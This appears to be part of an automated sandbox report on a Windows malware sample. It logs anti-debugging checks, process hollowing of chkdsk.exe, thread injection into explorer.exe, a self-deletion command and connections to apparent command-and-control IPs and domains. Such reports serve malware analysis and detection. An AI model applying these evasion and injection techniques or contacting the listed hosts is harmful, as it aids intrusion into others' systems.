Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h] 10_2_04DB4BAD
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h] 10_2_04DB4BAD
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h] 10_2_04DB4BAD
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8F358 mov eax, dword ptr fs:[00000030h] 10_2_04D8F358
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8DB40 mov eax, dword ptr fs:[00000030h] 10_2_04D8DB40
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB3B7A mov eax, dword ptr fs:[00000030h] 10_2_04DB3B7A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB3B7A mov eax, dword ptr fs:[00000030h] 10_2_04DB3B7A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8DB60 mov ecx, dword ptr fs:[00000030h] 10_2_04D8DB60
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E58B58 mov eax, dword ptr fs:[00000030h] 10_2_04E58B58
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4131B mov eax, dword ptr fs:[00000030h] 10_2_04E4131B
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_00409B40 LdrLoadDll, 3_2_00409B40
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 166.88.62.202 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.casatowerofficial.com
Source: C:\Windows\explorer.exe Domain query: www.bitconga.com
Source: C:\Windows\explorer.exe Domain query: www.totalwinerewards.com
Source: C:\Windows\explorer.exe Network Connect: 199.59.243.200 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tothelaundry.com
Source: C:\Windows\explorer.exe Domain query: www.omnipets.store
Source: C:\Windows\explorer.exe Network Connect: 46.252.151.235 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 18.231.72.25 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.webarate.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.experiencedlawfirms.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 90000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Memory written: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Thread register set: target process: 3352 Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Thread register set: target process: 3352 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe" Jump to behavior
Source: explorer.exe, 00000005.00000000.381888349.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.363941533.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.348780458.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.443876033.0000000000B68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman\Pr
Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.386172183.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.374858871.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.390116935.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356172587.0000000008778000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection
barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
